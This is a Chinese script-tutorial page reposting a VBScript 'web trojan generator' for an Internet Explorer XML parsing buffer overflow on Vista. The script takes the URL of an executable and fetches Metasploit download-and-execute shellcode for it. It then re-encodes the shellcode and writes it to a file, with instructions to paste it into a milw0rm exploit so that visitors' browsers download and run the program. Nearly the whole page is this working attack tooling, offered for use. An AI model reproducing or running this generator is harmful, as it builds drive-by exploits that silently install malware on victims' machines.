当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

VBScript
vbs在网页中显示服务
vbs得没公开对象
unpack.vbs
使用批处理文件异地备份数据库(最近几天的数据)
VBScript 中的字节数据操作函数
切换dos并dir的vbs
杀毒的对vbs相当敏感 免杀
多进程的vbs脚本
Windows管理脚本学习
15分钟提醒一次,珍惜时间啊
从一个VBS脚本学习一点点东西
exe2swf 工具(Adodb.Stream版)
使用脚本自动修改ip设置
深入挖掘Windows脚本技术
用VBSCRIPT控制ONSUBMIT事件
VBS中Select CASE的其它用法
vbscript 可以按引用传递参数吗?
下载文件到本地运行的vbs
飘叶千夫指源代码,又称qq刷屏器
SendKeys参考文档

VBScript 中的 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 201 ::
收藏到网摘: n/a

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代码 'code by lcx
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"